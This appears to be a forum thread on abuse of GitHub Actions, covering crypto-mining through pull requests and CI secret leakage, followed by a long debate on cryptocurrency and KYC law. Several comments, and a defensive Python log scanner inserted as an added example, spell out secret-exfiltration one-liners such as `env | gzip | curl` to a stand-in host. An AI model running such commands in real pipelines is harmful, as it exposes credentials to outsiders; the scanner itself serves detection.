- do not run on any event unless the user is authorized for that event. Same for actions.
- separate out policies; users cannot edit policies unless authorized to do that
- do not get physical/logical resources (runners, disk quota, long runs, ...) unless given
- default-deny network outbound with url safe-listing
That way only trusted users can run them, and it's a bit harder for them to get hurt when there is a surprising action that they run.
The next level would probably be something like sandboxing: allow anyone to run an action, but a sandbox mode can autofail if violated, and have explicit imports/exports to lock down how it gets used.
A lot is possible, but need to invest in the basics first.
Unfortunately, using self-hosted runners to provide additional capabilities not supported by Github-hosted ones is basically impossible (for public repos at least) as you can't restrict a runner to an organization or project. Set up a bare-metal runner and it will receive jobs from random forks.
Only if you've configured the actions correctly. I would bet that there is a high number of repositories on both GitLab and GitHub with misconfigured CI pipelines where someone can submit a PR with `env | curl` to grab any secrets defined as environment variables.
The correct mitigation is to ensure that any "secret" variables are marked as "protected" so they can only run on protected branches that are limited to pushes by maintainers. And you'll still need to make sure the masking works in the logs.
They do support integrating with Vault to access secrets in a CI job, but you need to pay them to use that feature. 
If you have access to a repository you can customize the script to do whatever you want, but there will always be a trace tracking it back to you.
There is a discussion about ultimate security (access only when asked) vs the convenience of self-service.
You can still avoid that by having people use a fork model, or triggering CD from an external project with tight access.
Putting a bureaucratic process between ICs will only limit their throughput, as in the Jenkins paradigm.
The better advice is don't hire people you can't trust
logs: `env | base64`
network: `env | gzip | curl`
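As an added example (not written by any commenter here), a log audit in Python that follows up on the two points above: masking only removes the literal secret, so `env | base64` walks past it. The scanner flags the secret in plain, hex and base64 form, matching base64 at every byte alignment the value can have inside a larger encoded dump, and separately flags any command that pipes the environment into another process. The secret value, the log lines and the `example.invalid` host are constructed for the demo.

```python
"""Audit CI job logs for secrets that escaped the log masking filter.

Masking replaces the literal value, so an `env | base64` dump passes it; this
check also matches base64 at every alignment the value can have in a stream."""
import base64
import re

# Constructed sample: one secret the CI system injects as an environment variable.
SECRETS = {"DEPLOY_TOKEN": "s3cr3t-deploy-token-9f2a"}

# Commands that pipe the whole environment somewhere are worth flagging on their own.
ENV_PIPED = re.compile(r"\b(print)?env\b\s*\|")


def base64_fragments(value: bytes) -> set:
    """Base64 substrings guaranteed to appear when `value` sits at byte
    offset 0, 1 or 2 (mod 3) inside a longer base64-encoded stream."""
    if len(value) < 6:
        raise ValueError("value too short to match reliably")
    frags = set()
    for shift in range(3):
        enc = base64.b64encode(b"\0" * shift + value).decode().rstrip("=")
        head = (0, 2, 3)[shift]                       # chars that mix in preceding bytes
        tail = 1 if (shift + len(value)) % 3 else 0   # last char mixes in the next byte
        frags.add(enc[head:len(enc) - tail])
    return frags


def contains_encoded(value: str, stream: bytes) -> bool:
    """True if base64(stream) exposes `value`, whatever its alignment."""
    encoded = base64.b64encode(stream).decode()
    return any(frag in encoded for frag in base64_fragments(value.encode()))


def scan_log(log_text: str, secrets: dict) -> list:
    """Return (line_no, secret_name or 'command', kind) for every hit."""
    needles = {}
    for name, value in secrets.items():
        raw = value.encode()
        needles[name] = {"plain": {value}, "hex": {raw.hex()},
                         "base64": base64_fragments(raw)}
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        for name, variants in needles.items():
            for kind, forms in variants.items():
                if any(form in line for form in forms):
                    findings.append((line_no, name, kind))
        if ENV_PIPED.search(line):
            findings.append((line_no, "command", "environment piped to another process"))
    return findings


# Constructed log excerpt: the masked literal, then `env | base64` output in which
# the same token sits at byte offset 23, i.e. 2 (mod 3), of the encoded stream.
SAMPLE_LOG = "\n".join([
    "$ echo $DEPLOY_TOKEN",
    "[MASKED]",
    "$ env | base64",
    base64.b64encode(b"PATH=/bin\nDEPLOY_TOKEN=s3cr3t-deploy-token-9f2a\nHOME=/root\n").decode(),
    "$ env | gzip | curl -T - https://example.invalid/",
])
```

Real `base64` output wraps at 76 columns, so join wrapped lines before scanning a full job log.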
It should be easy to set most workflows to run sandboxed with almost no capabilities - no secrets access, safelisted network access, safelisted package manager accesses for top 10 langs, etc - so that testing someone's PR isn't scary, and runtime violations make loud noises. The whole 'just disable actions on fork PRs' thing is a great default, but ultimately a figleaf as it's not hard to get someone to run an action.
If so, I wonder if there is a legit need for running modified GitHub actions from non-collaborators?
Could also subject modified actions coming in via pull requests (from non-collaborators) to heavy resources constraints and timeouts.
The attack vector in the article is not the main way miners try to steal CPU from the GitHub community. It's just an interesting one that the journalist chose to write about.
IIRC, they already treat the .github folder as a special case; you can't push modifications to workflow files with a personal access token. So why not ensure that an action or workflow will only run if it is checked into the base branch?
That wouldn't stop PRs from modifying scripts that the action runs, but the current behavior seems a bit counter-intuitive.
The threat models are probably more like 1. "make sure only the right people run actions" and separately, 2. "make sure authorized events/actions only use the expected capabilities." Both largely fail today.
The issue is that even if you don’t allow changes to the actual action workflow, running tests gives an attacker the ability to run arbitrary code. They just need to add the code they want to run to the tests (e.g. have the tests mine crypto)
Could temporarily reduce the population of abusers while we figure out a more sustainable strategy?
This speculation is making some people rich, yes. But the amount of externalities is staggering.
Thanks to PoW nobody can provide a free compute anymore without getting owned, and of course the environmental impact of bitcoin alone is worse than when Saddam Hussein set oil wells on fire while retreating.
Let the world burn, and products rot to shit, as long as my HODL portfolio goes up. Cryptocurrency supporters really are sociopaths, worse than any hedge fund manager.
There are lots of things driving for crypto besides speculation though. Suggesting cryptocurrency supporters are sociopaths is quite simplistic, and overlooks the majority who are not involved in anything like this article discusses
Like what? I mean aside from crime.
E.g. the "Venezuela argument" has been debunked, from my reading.
In my own life I've seen employees ask to be paid in bitcoin, because of the large fees involved in getting your salary and transferring it into Brazil.
So… those "fees" are mainly taxes, and not paying them is illegal.
The steelmanned argument, I guess, is that some people actually do want to buy stuff online without a third party knowing who paid whom.
First of all BTC is terrible for that. But second, most people don't care if a third party knows they bought pizza. Especially since the pizza place still knows, and they need to keep records anyway, because of tax laws.
Fourth, if they don't keep records then they can just say you didn't pay them. They can say "oh, that was not our wallet, you must have mistyped".
Fifth, if the pizza has poop on it you can't even reverse the charge.
Sixth, every pizza place will now be a money laundering scheme.
This is not what we want as individuals, nor as a society.
But yes, some people do want to buy a pizza online and not have a third party know. It's basically LARPing.
Buying a house or a car anonymously? That was made illegal on purpose.
Buying a big mansion anonymously? Well that's clearly at the very least tax fraud.
Anyway, I truly want to hear about any legit use case for cryptocurrencies that is not just LARPing, because as far as I've seen nobody in the 12 years since bitcoin launched has come up with one that actually makes sense.
> Suggesting cryptocurrency supporters are sociopaths is quite simplistic,
Yeah, it is. It's like the old expression "it's very hard to make someone understand something when their livelihood depends on them not understanding it", or something like that.
But the amount of rationalization from cryptocurrency proponents I do think is sociopathic.
> and overlooks the majority who are not involved in anything like this article discusses
When you're in the mob you're still one of the baddies, even if you're not actually the one murdering.
I do blame every cryptocurrency supporter. They are complicit in making the world worse for their own profits. They have a moral obligation to recognize their supporting role in this, and to stop it.
Cryptocurrency users aren't any more complicit in others using it for illicit activities than people who use cash. And you seem to be equating cryptocurrency with proof of work and bitcoin, which, again, are ignoring the majority of the real-world use cases.
But just to establish what you're saying, do you agree that PoW and BTC in particular is absolutely terrible for the world? Can we establish that?
I just want to make sure you're not selecting the parts I have not addressed in these comments and from there you're dismissing the things I have said.
If you can agree that PoW and BTC are awful, then there's no point in staying on that topic, but we can instead look at other parts. Otherwise it seems like a dishonest rhetorical device.
I don't know what countries you moved between, but what you did could be illegal. Or if not, the law may have not caught up yet, because the laws tend to be on the financial institutions, not the payer and payee. But probably the intention of the law is that it should be illegal.
Maybe. It depends how exactly the bitcoin was transferred.
I'm not a lawyer, but have a look at this:
That's requirements on payment service providers, so (maybe?) not on you. With a decentralized payment service provider, a case could be made that you are the payment service provider of this transaction, but let's assume not, to not make it simple. Still, it is the intention of this EU law that somebody is, right? That's the world in which the law was written.
If you agree with this, that the intention was that somebody has KYC (Know Your Customer) requirements on your transaction, then as I see it the only remaining argument is that you think KYC laws should not exist.
I hope I've not misrepresented you so far. I honestly want to build a trail from your truly legit and moral transaction to what it means in the larger picture.
If you're against KYC I don't quite know what your argument is (it could be a good one), but they were in fact put in place for a reason. Your honest transfer "under the radar" has the same technical means as the ISIS sympathizer's, and the money laundering mob boss's, or the tax dodging wall street CEO's.
I'll assume that you're not an anarchist-libertarian who considers all government action to be theft, and "money laundering" to be a non-crime.
So… the real question is how do we allow transactions like yours, but not make crime like this be trivial under the same technical means?
So far it's by KYC. And KYC laws and enforcement are not perfect. But baby and bathwater. If your argument is that KYC is inherently bad, then I disagree, but don't make it a distraction while actually making a different point.
And if cryptocurrency is "just like cash", that means that, just like with cash, you legally have to report international money transfers:
Do you think anyone has ever done this with bitcoin, or any other cryptocurrency? I assume not, because cryptocurrency people will pick and choose when it's "just like cash" and when it's not. Or they'll claim "it's not in a country, it's in cyberspace". But that's all clearly rationalizing to the point of trolling.
To summarize my point: The reason we can't have nice things, the reason there are fees and taxes on international money transfers, is that this is exactly the place where an uncountable amount of fraud and crime happens. It's not "clever" to go around KYC, it's illegal. (or if not technically illegal, the intent clearly was that it would be)
(I have more points against cryptocurrencies, but bringing up every topic at the same time will just be a big distracted mess. If we've agreed on PoW, and if you agree on KYC, then maybe we can do other arguments too)
And I'm not libertarian (I'm far too socialist), but I do believe that there are problems with the extent to which we are being tracked by governments, especially because I have a lot of issues with various laws around the world (see: criminalizing homosexuality, drugs, sex toys, women driving). I do believe controlling the methods by which people pay for things extends government control, and having more freedom there allows more personal freedom in general. Perhaps surprisingly, I do support paying due taxes (when it's often what funds social services and social programs).
Actually, speaking of money laundering, I learned recently that you can pay taxes on illicit income and the IRS won't have any issue with you. However, I don't trust that this isn't used to track down criminals by criminal agencies. Money laundering allows people to pay their taxes without implicating themselves, so in many ways it's something I support.
I'm not in any way suggesting cryptocurrency is a good way to get around government tracking. Cash might often be better. I don't particularly support KYC, so I'm excited to see the development around decentralized exchanges. And I think painting all "crime" with the same brush is quite reductive. Yesterday's crime is too often tomorrow's activism: breaking an NDA to expose human rights abuses, using a VPN to browse Wikipedia, the list goes on.
But yes, I 100% agree about PoW being problematic, and have frequently posted on HN about how the only way it will be solved is through government intervention. I guess I'm not much of an anarchist either.
And that the trade-off between allowing your transaction and preventing organized crime is why KYC and money laundering laws were created.
I recently did a 6 figure international transfer, and I had to talk to people at the bank, who had to sign off that the source of my funds were fine and I wasn't doing anything shady (nor being defrauded). Just a 15min phone call.
For someone who regularly does this I assume it's streamlined, but it does make sense for the bank to be suspicious on multiple levels when I do the biggest transfer of my life.
They also checked with me to make sure I did basic security precautions like "Did someone contact you and tell you to make this transfer, or did you come up with it yourself? Did someone send you the account number, or did you look it up on a trusted source?".
Sure, part of that was "cover your ass" for the bank's liability to a mistake, but some of it is legally mandated for KYC/ML.
Again, don't take my comments as saying governments or these laws in particular are perfect. I'm saying they are deliberate because something like them is really really a good idea, both for the individual and society as a whole.
But I think it's a red herring to say "some governments criminalize homosexuality, therefore KYC/ML laws are bad or overreaching".
> I don't particularly support KYC
So what's your alternative proposal for preventing / detecting the crime it really does catch?
What's your proposal for forcing banks to not look the other way when drug cartels bank their profits?
Again, I'm not saying it's perfect, but without KYC/ML banks wouldn't even have an obligation to look, and would have no liability when they aid organized crime. Clearly we need to do something? KYC/ML is not flawless, but it also works. So this is not a "We have to do something, this is something" case.
If you take away KYC/ML you have to replace it with something better. Otherwise you're just saying "defund the police" with no plan to replace the police.
So that's KYC/ML.
I guess I brought up taxes a little bit, but it's another chapter in the book on cryptocurrencies.
Right now there is huge tax evasion happening in industries that deal with cash. Taxi drivers are a prime example, but also plumbers, carpenters, etc...
Not everyone, of course, but it's so easy for them. E.g. it's common practice among people felling trees for people that they charge a lot because they need to pay insurance in case the tree falls on something expensive. But when the tree doesn't, they just pocket the whole thing and don't tell the tax man or insurance company.
What if we had the cryptocurrency dystopia, where everyone who wants to can get paid in some ideal cryptocurrency? I bet you HUGE parts of salaries will suddenly go dark, and be tax free.
People earning 6-7 digit salaries would just not declare that at all. It would take a lot of sense of civic duty to hand off 5-6 digits per year if you know you can get away with not doing that. Most people don't have that, and I can admit I'd be super tempted too, if I knew math would protect me perfectly.
The reason people actually pay income tax today is because double entry accounting and the paper trail actually makes it hard to hide salary payments. And paying people in cash is also logistically hard, and even harder if you have to do it fraudulently.
You can do it with low wage workers, but I sure as hell wouldn't want to have to deal with thousands of dollars in my hand every week.
But even then, in many countries it's illegal to pay salaries in cash. Because of the rampant fraud that happens when salaries are in cash.
And why would you want to be paid in cash to hide it from the government? You say you believe in taxes, so the tax man will know your income eventually anyway. So there's no point in hiding it.
Interesting about IRS and theoretically not reporting you. Sounds similar to some places where robbing a bank with a fake gun carries a lighter sentence, so that robbers are incentivized to bring the fake gun instead of the real one, thus reducing harm to innocent bystanders and police.
They got Capone for tax evasion, so it's a charge you don't want. But I suspect if you just declare your bank robbery gains, that's not going to work well for you.
Proof of Work?
A lot of them are already trying to shift to other viable alternative proofs.
Your analogy of calling cryptocurrency supporters sociopaths sounds similar to insulting Edison because he designed the inefficient incandescent bulbs, which consume waaay more energy compared to LEDs built these days.
How would it sound if someone insulted artificial light just because of that?
Cryptocurrencies are perfectly good ideas/products.
Proof of Work’s viability isn’t.
The hate is aimed in the wrong direction.
If he designed and sold that in 2021, trying to replace LED lightbulbs, and lying through his teeth to pump up the value of his lightbulbs, well then yes.
Can blockchain people please first come up with a use case that isn't crime, before saying it's worth using more energy than many countries? (for a rounding error away from 0 number of transactions)
All the enumerated use cases are so naive and uninformed that clearly they've just been invented without knowledge about the field. "Move aside, expert in field, I'll just solve this with technology. No I don't need to hear you describe the issues".
Maybe the cryptocurrency industry needs some environmental regulation thrown at it?
for scammers and speculators
You’ll know why it’s a great product/service once its environmental viability has been figured out.
Hating crypto, because news reporters only show you the scammers and the speculators, is blind hatred.
Crypto has/does much much more than just act as a form of trading/speculation.
Scammers often steal money in dollars too.
Speculators often trade currency pairs with dollar in them.
Are you still gonna say people who use the dollar for daily transactions don’t exist?
That the dollar is also a good idea only for scammers and speculators?
I've done many. Order of magnitude better experience than bitcoin, which I've also done.
And without knowing that your bitcoin transaction cost many tonnes of CO2 on stolen electricity (~70% of which is based on fossil fuels, per a recent bitcoin energy use study).
It's like building an instant messaging system based on throwing molotov cocktails on your neighbors houses to create smoke signals.
> try using smart contracts in crypto
Smart contracts is just the dumbest idea yet. Anyone who thinks they're a good idea clearly doesn't know what the actual challenges are in existing contracts. It's not solving these challenges at all, but instead making them much worse.
> Hating crypto, because news reporters only show you the scammers and the speculators, is blind hatred.
Seriously? But that's all there is. To a rounding error.
And for good reason. Aside for committing crimes cryptocurrencies are worse in every single aspect.
> Are you still gonna say people who use the dollar for daily transactions don’t exist? That the dollar is also a good idea only for scammers and speculators?
What do you think the percentage of dollar transaction that's crime? What do you think is the case for bitcoin?
If someone is willing to fund time spent on researching how to do it safely I would do it.
But I am not aware of anyone willing to fund hundreds of hours on such research. And it includes myself.
I do not care what 'news' reporters 'report'. I am in contact with several crypto-adjacent messages each week, all of them scammers, in my mail inbox, on Telegram, in Discord.
Crypto-adjacent scam spam is over half of the ads that manage to reach me on my own computer.
I consider it perfectly good reason to heavily dislike BTC and BTC-adjacent things.
> Crypto has/does much much more than just act as a form of trading/speculation.
Yes, it is also scam platform.
No, because it is untrue. Unlike crypto.